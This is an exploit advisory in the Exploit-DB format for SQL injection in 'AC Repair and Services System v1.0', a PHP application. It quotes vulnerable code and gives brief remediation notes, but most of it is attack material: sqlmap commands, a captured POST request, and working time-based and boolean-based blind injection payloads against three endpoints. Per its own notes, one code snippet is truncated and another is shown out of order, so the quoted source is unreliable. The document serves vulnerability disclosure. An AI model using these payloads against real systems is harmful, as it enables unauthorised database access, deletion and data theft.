# Exploit Title: AC Repair and Services System v1.0 - Multiple SQL Injection
# Date: 27 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(/php-acrss/admin/user/manage_user.php):

[Note: the start of this snippet (the opening `<?php` block and the object on which `query()` is called) is missing from this reproduction; only the tail survives.]

query("SELECT * FROM users where id ='{$_GET['id']}' ");
foreach($user->fetch_array() as $k =>$v){
    $meta[$k] = $v;
}
}
?>

Root cause: the `id` request parameter is interpolated directly into the SQL string. Remediation is a prepared statement with `id` passed as a bound parameter rather than concatenated into the query.

-> sqlmap -u "http://localhost/php-acrss/admin/?page=user/manage_user&id=" --batch

---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=user/manage_user&id=' AND (SELECT 5500 FROM (SELECT(SLEEP(5)))hiCZ) AND 'rZIs'='rZIs
---

Source Code(/php-acrss/classes/Master.php):

function delete_inquiry(){
    extract($_POST);
    $del = $this->conn->query("DELETE FROM `inquiry_list` where id = '{$id}'");
    if($del){
        $resp['status'] = 'success';
        $this->settings->set_flashdata('success'," Inquiry successfully deleted.");
    }else{
        $resp['status'] = 'failed';
        $resp['error'] = $this->conn->error;
    }
    return json_encode($resp);
}

Root cause: `extract($_POST)` turns every field of the request body into a local variable, and `$id` is then interpolated unescaped into the DELETE statement. Remediation is to read `id` explicitly from `$_POST`, validate it (an integer is expected here), and bind it in a prepared statement; `extract()` on request data should be avoided entirely, since it also lets a client overwrite any other local in scope.

-> sqlmap -u "http://localhost/php-acrss/classes/Master.php?f=delete_inquiry" --data="id=*" --batch

---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=' AND (SELECT 7930 FROM (SELECT(SLEEP(5)))XwlG) AND 'Jimw'='Jimw
---

Source Code(/php-acrss/classes/Users.php):

[Note: the lines of this snippet appear to be reproduced out of order; the loop that assembles `$data` is shown after the UPDATE that consumes it.]

$qry = $this->conn->query("UPDATE users set $data where id = {$id}");
if($qry){
    $this->settings->set_flashdata('success','User Details successfully updated.');
    foreach($_POST as $k => $v){
        if($k != 'id'){
            if(!empty($data)) $data .=" , ";
            if($this->settings->userdata('id') == $id) $this->settings->set_userdata($k,$v);
        }
    }

Root cause: `$id` is interpolated unquoted into the WHERE clause, and `$data` (the SET clause) is built up from the raw `$_POST` loop. Remediation is a prepared statement with `id` bound as a parameter and the SET clause restricted to an explicit allow-list of column names, with their values bound rather than concatenated.

POST /php-acrss/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 943
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAUtgvsSwiJifz27g
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-acrss/admin/?page=user/manage_user&id=9
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=o92n8nati3696kg69plidv5e77
Connection: close

------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="id"

9
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="firstname"

Claire
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="middlename"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="lastname"

Blake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="username"

cblake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAUtgvsSwiJifz27g--

-> sqlmap -r ~/Documents/POST-localhost.txt --batch

---
Parameter: MULTIPART id ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="id"

(SELECT (CASE WHEN (3947=3947) THEN 9 ELSE (SELECT 2252 UNION SELECT 2638) END))
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="firstname"

Claire
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="middlename"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="lastname"

Blake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="username"

cblake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAUtgvsSwiJifz27g--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="id"

9 AND (SELECT 7168 FROM (SELECT(SLEEP(5)))pifO)
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="firstname"

Claire
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="middlename"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="lastname"

Blake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="username"

cblake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryAUtgvsSwiJifz27g--
---